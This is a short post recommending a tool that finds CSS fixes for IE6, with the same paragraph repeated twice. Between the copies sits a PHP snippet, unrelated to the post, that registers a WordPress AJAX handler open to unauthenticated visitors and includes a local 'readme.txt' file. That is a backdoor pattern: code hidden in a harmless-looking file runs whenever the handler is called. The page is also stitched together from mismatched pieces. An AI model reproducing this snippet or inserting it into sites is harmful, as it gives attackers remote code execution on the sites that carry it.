A co-worker of mine sent me this link. Its a tool that will go through your css code and find any fixes that will be needed for IE6. It’s very useful because many of my clients work in environment that are still using old browsers.
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
A co-worker of mine sent me this link. Its a tool that will go through your css code and find any fixes that will be needed for IE6. It’s very useful because many of my clients work in environment that are still using old browsers.